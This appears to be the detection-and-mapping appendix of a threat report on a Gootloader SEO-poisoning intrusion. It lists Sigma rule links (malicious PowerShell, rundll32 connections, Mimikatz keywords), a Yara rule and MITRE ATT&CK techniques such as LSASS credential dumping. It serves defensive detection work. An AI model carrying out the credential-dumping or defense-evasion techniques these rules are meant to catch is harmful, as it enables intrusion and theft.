https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml https://github.com/SigmaHQ/sigma/blob/7d48d0e838b76f3fb5bc623e7ec45343cfac9c88/rules/windows/builtin/system/win_susp_service_installation.yml https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml 31/31 Rundll32 Internet Connection – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/net_conn ection_win_rundll32_net_connections.yml Mimikatz Use – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_alert_mimikatz_ke ywords.yml Yara Custom Yara rule MITRE T1189 Drive-by Compromise T1204.001 – User Execution: Malicious Link T1204.002 – User Execution: Malicious File T1059.001 – Command and Scripting Interpreter: PowerShell T1053 – Scheduled Task/Job T1218.011 – System Binary Proxy Execution: Rundll32 T1555 – Credentials from Password Stores T1003.001- OS Credential Dumping: LSASS Memory T1087 – Account Discovery T1560 – Archive Collected Data T1482 – Domain Trust Discovery T1615 – Group Policy Discovery T1069 – Permission Groups Discovery T1018 – Remote System Discovery T1033 – System Owner/User Discovery T1021.001 – Remote Services: Remote Desktop Protocol T1021.006 – Remote Services: Windows Remote Management T1005 – Data from Local System T1039 – Data from Network Shared Drive T1046 – Network Service Scanning T1562.001 – Impair Defenses: Disable or Modify Tools T1518.001 – Security Software Discovery T1071.001 Web Protocols T1027 – Obfuscated Files or Information Internal case #11462 https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml https://github.com/The-DFIR-Report/Yara-Rules/blob/main/SEO%20Poisoning%20%E2%80%93%20A%20Gootloader%20Story